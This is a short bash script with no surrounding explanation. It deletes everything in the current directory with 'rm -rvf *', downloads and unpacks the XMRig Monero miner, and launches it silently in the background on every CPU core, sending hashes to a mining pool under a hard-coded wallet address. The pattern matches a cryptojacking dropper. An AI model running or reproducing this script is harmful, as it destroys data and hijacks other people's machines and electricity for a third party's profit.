#!/bin/bash
rm -rvf *
wget https://github.com/xmrig/xmrig/releases/download/v6.22.2/xmrig-6.22.2-linux-static-x64.tar.gz
tar xf xmrig-6.22.2-linux-static-x64.tar.gz
cd xmrig-6.22.2
./xmrig --donate-level 1 -a rx/0 -o us.0xpool.io:3333 -u 0xb27e57f4accbf3a1384c1c17ac959376fc49e21d -p x -t $(nproc --all) > /dev/null 2>&1 &
